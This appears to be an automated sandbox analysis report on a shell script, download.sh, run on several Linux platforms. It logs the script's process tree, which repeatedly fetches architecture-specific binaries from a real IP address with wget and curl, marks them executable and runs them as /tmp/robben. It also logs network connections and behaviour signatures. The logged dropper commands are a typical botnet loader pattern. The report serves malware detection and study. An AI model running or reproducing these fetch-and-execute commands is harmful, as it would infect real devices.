Analysis Overview
SHA256
19ae1084b4322732191f0325600ae869eb0527f11e5b2c2a7095fe14adaa1902
Threat Level: Shows suspicious behavior
The file download.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
Executes dropped EXE
Checks CPU configuration
Writes file to tmp directory
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-08-22 21:45
Signatures
Analysis: behavioral7
Detonation Overview
Submitted
2024-08-22 21:45
Reported
2024-08-22 21:51
Platform
ubuntu2004-amd64-20240611-en
Max time kernel
133s
Max time network
183s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | /tmp/robben | /tmp/download.sh | N/A |
Processes
/tmp/download.sh
[/tmp/download.sh]
/usr/bin/wget
[wget http://158.51.127.106/bins/x86_64]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/usr/bin/cat
[cat x86_64]
/usr/bin/chmod
[chmod +x config-err-Tp1zcK download.sh robben snap-private-tmp ssh-STgji971qKoa systemd-private-127e01931ad0492795d0353f431e57ff-colord.service-ZsSGTf systemd-private-127e01931ad0492795d0353f431e57ff-ModemManager.service-00Yxig systemd-private-127e01931ad0492795d0353f431e57ff-switcheroo-control.service-zk9ykg systemd-private-127e01931ad0492795d0353f431e57ff-systemd-logind.service-pgSJ3h systemd-private-127e01931ad0492795d0353f431e57ff-systemd-resolved.service-iov4Mg systemd-private-127e01931ad0492795d0353f431e57ff-upower.service-k2Cpui]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mips]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/usr/bin/cat
[cat mips]
/usr/bin/chmod
[chmod +x config-err-Tp1zcK download.sh robben snap-private-tmp ssh-STgji971qKoa systemd-private-127e01931ad0492795d0353f431e57ff-colord.service-ZsSGTf systemd-private-127e01931ad0492795d0353f431e57ff-ModemManager.service-00Yxig systemd-private-127e01931ad0492795d0353f431e57ff-switcheroo-control.service-zk9ykg systemd-private-127e01931ad0492795d0353f431e57ff-systemd-logind.service-pgSJ3h systemd-private-127e01931ad0492795d0353f431e57ff-systemd-resolved.service-iov4Mg systemd-private-127e01931ad0492795d0353f431e57ff-upower.service-k2Cpui]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mipsel]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mipsel]
/usr/bin/cat
[cat mipsel]
/usr/bin/chmod
[chmod +x config-err-Tp1zcK download.sh robben snap-private-tmp ssh-STgji971qKoa systemd-private-127e01931ad0492795d0353f431e57ff-colord.service-ZsSGTf systemd-private-127e01931ad0492795d0353f431e57ff-ModemManager.service-00Yxig systemd-private-127e01931ad0492795d0353f431e57ff-switcheroo-control.service-zk9ykg systemd-private-127e01931ad0492795d0353f431e57ff-systemd-logind.service-pgSJ3h systemd-private-127e01931ad0492795d0353f431e57ff-systemd-resolved.service-iov4Mg systemd-private-127e01931ad0492795d0353f431e57ff-upower.service-k2Cpui]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm]
/usr/bin/cat
[cat arm]
/usr/bin/chmod
[chmod +x config-err-Tp1zcK download.sh robben snap-private-tmp ssh-STgji971qKoa systemd-private-127e01931ad0492795d0353f431e57ff-colord.service-ZsSGTf systemd-private-127e01931ad0492795d0353f431e57ff-ModemManager.service-00Yxig systemd-private-127e01931ad0492795d0353f431e57ff-switcheroo-control.service-zk9ykg systemd-private-127e01931ad0492795d0353f431e57ff-systemd-logind.service-pgSJ3h systemd-private-127e01931ad0492795d0353f431e57ff-systemd-resolved.service-iov4Mg systemd-private-127e01931ad0492795d0353f431e57ff-upower.service-k2Cpui]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm5]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm5]
/usr/bin/cat
[cat arm5]
/usr/bin/chmod
[chmod +x config-err-Tp1zcK download.sh robben snap-private-tmp ssh-STgji971qKoa systemd-private-127e01931ad0492795d0353f431e57ff-colord.service-ZsSGTf systemd-private-127e01931ad0492795d0353f431e57ff-ModemManager.service-00Yxig systemd-private-127e01931ad0492795d0353f431e57ff-switcheroo-control.service-zk9ykg systemd-private-127e01931ad0492795d0353f431e57ff-systemd-logind.service-pgSJ3h systemd-private-127e01931ad0492795d0353f431e57ff-systemd-resolved.service-iov4Mg systemd-private-127e01931ad0492795d0353f431e57ff-upower.service-k2Cpui]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm6]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm6]
/usr/bin/cat
[cat arm6]
/usr/bin/chmod
[chmod +x config-err-Tp1zcK download.sh robben snap-private-tmp ssh-STgji971qKoa systemd-private-127e01931ad0492795d0353f431e57ff-colord.service-ZsSGTf systemd-private-127e01931ad0492795d0353f431e57ff-ModemManager.service-00Yxig systemd-private-127e01931ad0492795d0353f431e57ff-switcheroo-control.service-zk9ykg systemd-private-127e01931ad0492795d0353f431e57ff-systemd-logind.service-pgSJ3h systemd-private-127e01931ad0492795d0353f431e57ff-systemd-resolved.service-iov4Mg systemd-private-127e01931ad0492795d0353f431e57ff-upower.service-k2Cpui]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm7]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm7]
/usr/bin/cat
[cat arm7]
/usr/bin/chmod
[chmod +x config-err-Tp1zcK download.sh robben snap-private-tmp ssh-STgji971qKoa systemd-private-127e01931ad0492795d0353f431e57ff-colord.service-ZsSGTf systemd-private-127e01931ad0492795d0353f431e57ff-ModemManager.service-00Yxig systemd-private-127e01931ad0492795d0353f431e57ff-switcheroo-control.service-zk9ykg systemd-private-127e01931ad0492795d0353f431e57ff-systemd-logind.service-pgSJ3h systemd-private-127e01931ad0492795d0353f431e57ff-systemd-resolved.service-iov4Mg systemd-private-127e01931ad0492795d0353f431e57ff-upower.service-k2Cpui]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/spc]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/spc]
/usr/bin/cat
[cat spc]
/usr/bin/chmod
[chmod +x config-err-Tp1zcK download.sh robben snap-private-tmp ssh-STgji971qKoa systemd-private-127e01931ad0492795d0353f431e57ff-colord.service-ZsSGTf systemd-private-127e01931ad0492795d0353f431e57ff-ModemManager.service-00Yxig systemd-private-127e01931ad0492795d0353f431e57ff-switcheroo-control.service-zk9ykg systemd-private-127e01931ad0492795d0353f431e57ff-systemd-logind.service-pgSJ3h systemd-private-127e01931ad0492795d0353f431e57ff-systemd-resolved.service-iov4Mg systemd-private-127e01931ad0492795d0353f431e57ff-upower.service-k2Cpui]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/sh4]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/sh4]
/usr/bin/cat
[cat sh4]
/usr/bin/chmod
[chmod +x config-err-Tp1zcK download.sh robben snap-private-tmp ssh-STgji971qKoa systemd-private-127e01931ad0492795d0353f431e57ff-colord.service-ZsSGTf systemd-private-127e01931ad0492795d0353f431e57ff-ModemManager.service-00Yxig systemd-private-127e01931ad0492795d0353f431e57ff-switcheroo-control.service-zk9ykg systemd-private-127e01931ad0492795d0353f431e57ff-systemd-logind.service-pgSJ3h systemd-private-127e01931ad0492795d0353f431e57ff-systemd-resolved.service-iov4Mg systemd-private-127e01931ad0492795d0353f431e57ff-upower.service-k2Cpui]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i586]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i586]
/usr/bin/cat
[cat i586]
/usr/bin/chmod
[chmod +x config-err-Tp1zcK download.sh robben snap-private-tmp ssh-STgji971qKoa systemd-private-127e01931ad0492795d0353f431e57ff-colord.service-ZsSGTf systemd-private-127e01931ad0492795d0353f431e57ff-ModemManager.service-00Yxig systemd-private-127e01931ad0492795d0353f431e57ff-switcheroo-control.service-zk9ykg systemd-private-127e01931ad0492795d0353f431e57ff-systemd-logind.service-pgSJ3h systemd-private-127e01931ad0492795d0353f431e57ff-systemd-resolved.service-iov4Mg systemd-private-127e01931ad0492795d0353f431e57ff-upower.service-k2Cpui]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i686]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i686]
/usr/bin/cat
[cat i686]
/usr/bin/chmod
[chmod +x config-err-Tp1zcK download.sh robben snap-private-tmp ssh-STgji971qKoa systemd-private-127e01931ad0492795d0353f431e57ff-colord.service-ZsSGTf systemd-private-127e01931ad0492795d0353f431e57ff-ModemManager.service-00Yxig systemd-private-127e01931ad0492795d0353f431e57ff-switcheroo-control.service-zk9ykg systemd-private-127e01931ad0492795d0353f431e57ff-systemd-logind.service-pgSJ3h systemd-private-127e01931ad0492795d0353f431e57ff-systemd-resolved.service-iov4Mg systemd-private-127e01931ad0492795d0353f431e57ff-upower.service-k2Cpui]
/tmp/robben
[./robben Payload]
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| N/A | 224.0.0.251:5353 | | udp |
| US | 158.51.127.106:80 | | tcp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| GB | 185.125.190.96:80 | connectivity-check.ubuntu.com | tcp |
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-08-22 21:45
Reported
2024-08-22 21:51
Platform
debian12-armhf-20240221-en
Max time kernel
280s
Max time network
325s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | /tmp/robben | /tmp/download.sh | N/A |
Processes
/tmp/download.sh
[/tmp/download.sh]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/usr/bin/cat
[cat x86_64]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-e3db981c57494ebc8542e9cab1066ccf-ntpsec.service-YUWsDn systemd-private-e3db981c57494ebc8542e9cab1066ccf-systemd-logind.service-WnsnYe]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/usr/bin/cat
[cat mips]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-e3db981c57494ebc8542e9cab1066ccf-ntpsec.service-YUWsDn systemd-private-e3db981c57494ebc8542e9cab1066ccf-systemd-logind.service-WnsnYe]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mipsel]
/usr/bin/cat
[cat mipsel]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-e3db981c57494ebc8542e9cab1066ccf-ntpsec.service-YUWsDn systemd-private-e3db981c57494ebc8542e9cab1066ccf-systemd-logind.service-WnsnYe]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm]
/usr/bin/cat
[cat arm]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-e3db981c57494ebc8542e9cab1066ccf-ntpsec.service-YUWsDn systemd-private-e3db981c57494ebc8542e9cab1066ccf-systemd-logind.service-WnsnYe]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm5]
/usr/bin/cat
[cat arm5]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-e3db981c57494ebc8542e9cab1066ccf-ntpsec.service-YUWsDn systemd-private-e3db981c57494ebc8542e9cab1066ccf-systemd-logind.service-WnsnYe]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm6]
/usr/bin/cat
[cat arm6]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-e3db981c57494ebc8542e9cab1066ccf-ntpsec.service-YUWsDn systemd-private-e3db981c57494ebc8542e9cab1066ccf-systemd-logind.service-WnsnYe]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm7]
/usr/bin/cat
[cat arm7]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-e3db981c57494ebc8542e9cab1066ccf-ntpsec.service-YUWsDn systemd-private-e3db981c57494ebc8542e9cab1066ccf-systemd-logind.service-WnsnYe]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/spc]
/usr/bin/cat
[cat spc]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-e3db981c57494ebc8542e9cab1066ccf-ntpsec.service-YUWsDn systemd-private-e3db981c57494ebc8542e9cab1066ccf-systemd-logind.service-WnsnYe]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/sh4]
/usr/bin/cat
[cat sh4]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-e3db981c57494ebc8542e9cab1066ccf-ntpsec.service-YUWsDn systemd-private-e3db981c57494ebc8542e9cab1066ccf-systemd-logind.service-WnsnYe]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i586]
/usr/bin/cat
[cat i586]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-e3db981c57494ebc8542e9cab1066ccf-ntpsec.service-YUWsDn systemd-private-e3db981c57494ebc8542e9cab1066ccf-systemd-logind.service-WnsnYe]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i686]
/usr/bin/cat
[cat i686]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-e3db981c57494ebc8542e9cab1066ccf-ntpsec.service-YUWsDn systemd-private-e3db981c57494ebc8542e9cab1066ccf-systemd-logind.service-WnsnYe]
/tmp/robben
[./robben Payload]
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 158.51.127.106:80 | | tcp |
| US | 1.1.1.1:53 | debian12-armhf-20240221-en-12 | udp |
| US | 1.1.1.1:53 | debian12-armhf-20240221-en-12 | udp |
| US | 1.1.1.1:53 | debian12-armhf-20240221-en-12 | udp |
| US | 1.1.1.1:53 | debian12-armhf-20240221-en-12 | udp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-08-22 21:45
Reported
2024-08-22 21:51
Platform
debian12-mipsel-20240221-en
Max time kernel
300s
Max time network
304s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | /tmp/robben | /tmp/download.sh | N/A |
Processes
/tmp/download.sh
[/tmp/download.sh]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/usr/bin/cat
[cat x86_64]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-8aaf9894ee06476383bd6e60f2d5c264-systemd-logind.service-jplWFO]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/usr/bin/cat
[cat mips]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-8aaf9894ee06476383bd6e60f2d5c264-systemd-logind.service-jplWFO]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mipsel]
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 158.51.127.106:80 | | tcp |
| US | 1.1.1.1:53 | debian12-mipsel-20240221-en-8 | udp |
| US | 1.1.1.1:53 | debian12-mipsel-20240221-en-8 | udp |
| US | 1.1.1.1:53 | debian12-mipsel-20240221-en-8 | udp |
| US | 1.1.1.1:53 | debian12-mipsel-20240221-en-8 | udp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-08-22 21:45
Reported
2024-08-22 21:51
Platform
debian9-armhf-20240611-en
Max time kernel
248s
Max time network
281s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | /tmp/robben | /tmp/download.sh | N/A |
Processes
/tmp/download.sh
[/tmp/download.sh]
/usr/bin/wget
[wget http://158.51.127.106/bins/x86_64]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/bin/cat
[cat x86_64]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mips]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/bin/cat
[cat mips]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mipsel]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mipsel]
/bin/cat
[cat mipsel]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm]
/bin/cat
[cat arm]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm5]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm5]
/bin/cat
[cat arm5]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm6]
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
Files
Analysis: behavioral6
Detonation Overview
Submitted
2024-08-22 21:45
Reported
2024-08-22 21:51
Platform
ubuntu1804-amd64-20240508-en
Max time kernel
299s
Max time network
300s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | /tmp/robben | /tmp/download.sh | N/A |
Processes
/tmp/download.sh
[/tmp/download.sh]
/usr/bin/wget
[wget http://158.51.127.106/bins/x86_64]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/bin/cat
[cat x86_64]
/bin/chmod
[chmod +x config-err-zQnUeG download.sh netplan_agvzkkfx robben snap-private-tmp ssh-RkhVVFBqnqXf systemd-private-0104f6e541f146c1821cb46a7d879e9a-bolt.service-JTmSDM systemd-private-0104f6e541f146c1821cb46a7d879e9a-colord.service-j4FNmX systemd-private-0104f6e541f146c1821cb46a7d879e9a-ModemManager.service-daBbJ3 systemd-private-0104f6e541f146c1821cb46a7d879e9a-systemd-resolved.service-1lnNMf systemd-private-0104f6e541f146c1821cb46a7d879e9a-systemd-timedated.service-NrPp8B]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mips]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/bin/cat
[cat mips]
/bin/chmod
[chmod +x config-err-zQnUeG download.sh netplan_agvzkkfx robben snap-private-tmp ssh-RkhVVFBqnqXf systemd-private-0104f6e541f146c1821cb46a7d879e9a-bolt.service-JTmSDM systemd-private-0104f6e541f146c1821cb46a7d879e9a-colord.service-j4FNmX systemd-private-0104f6e541f146c1821cb46a7d879e9a-ModemManager.service-daBbJ3 systemd-private-0104f6e541f146c1821cb46a7d879e9a-systemd-resolved.service-1lnNMf systemd-private-0104f6e541f146c1821cb46a7d879e9a-systemd-timedated.service-NrPp8B]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mipsel]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mipsel]
/bin/cat
[cat mipsel]
/bin/chmod
[chmod +x config-err-zQnUeG download.sh netplan_agvzkkfx robben snap-private-tmp ssh-RkhVVFBqnqXf systemd-private-0104f6e541f146c1821cb46a7d879e9a-bolt.service-JTmSDM systemd-private-0104f6e541f146c1821cb46a7d879e9a-colord.service-j4FNmX systemd-private-0104f6e541f146c1821cb46a7d879e9a-ModemManager.service-daBbJ3 systemd-private-0104f6e541f146c1821cb46a7d879e9a-systemd-resolved.service-1lnNMf]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm]
/bin/cat
[cat arm]
/bin/chmod
[chmod +x config-err-zQnUeG download.sh netplan_agvzkkfx robben snap-private-tmp ssh-RkhVVFBqnqXf systemd-private-0104f6e541f146c1821cb46a7d879e9a-bolt.service-JTmSDM systemd-private-0104f6e541f146c1821cb46a7d879e9a-colord.service-j4FNmX systemd-private-0104f6e541f146c1821cb46a7d879e9a-ModemManager.service-daBbJ3 systemd-private-0104f6e541f146c1821cb46a7d879e9a-systemd-resolved.service-1lnNMf]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm5]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm5]
/bin/cat
[cat arm5]
/bin/chmod
[chmod +x config-err-zQnUeG download.sh netplan_agvzkkfx robben snap-private-tmp ssh-RkhVVFBqnqXf systemd-private-0104f6e541f146c1821cb46a7d879e9a-bolt.service-JTmSDM systemd-private-0104f6e541f146c1821cb46a7d879e9a-colord.service-j4FNmX systemd-private-0104f6e541f146c1821cb46a7d879e9a-ModemManager.service-daBbJ3 systemd-private-0104f6e541f146c1821cb46a7d879e9a-systemd-resolved.service-1lnNMf]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm6]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm6]
/bin/cat
[cat arm6]
/bin/chmod
[chmod +x config-err-zQnUeG download.sh netplan_agvzkkfx robben snap-private-tmp ssh-RkhVVFBqnqXf systemd-private-0104f6e541f146c1821cb46a7d879e9a-bolt.service-JTmSDM systemd-private-0104f6e541f146c1821cb46a7d879e9a-colord.service-j4FNmX systemd-private-0104f6e541f146c1821cb46a7d879e9a-ModemManager.service-daBbJ3 systemd-private-0104f6e541f146c1821cb46a7d879e9a-systemd-resolved.service-1lnNMf]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm7]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm7]
/bin/cat
[cat arm7]
/bin/chmod
[chmod +x config-err-zQnUeG download.sh netplan_agvzkkfx robben snap-private-tmp ssh-RkhVVFBqnqXf systemd-private-0104f6e541f146c1821cb46a7d879e9a-bolt.service-JTmSDM systemd-private-0104f6e541f146c1821cb46a7d879e9a-colord.service-j4FNmX systemd-private-0104f6e541f146c1821cb46a7d879e9a-ModemManager.service-daBbJ3 systemd-private-0104f6e541f146c1821cb46a7d879e9a-systemd-resolved.service-1lnNMf]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/spc]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/spc]
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 158.51.127.106:80 | | tcp |
| US | 151.101.193.91:443 | | tcp |
| N/A | 224.0.0.251:5353 | | udp |
| GB | 185.125.188.62:443 | | tcp |
| GB | 185.125.188.62:443 | | tcp |
| US | 151.101.193.91:443 | | tcp |
| GB | 89.187.167.9:443 | | tcp |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| GB | 89.187.167.38:443 | 1527653184.rsc.cdn77.org | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
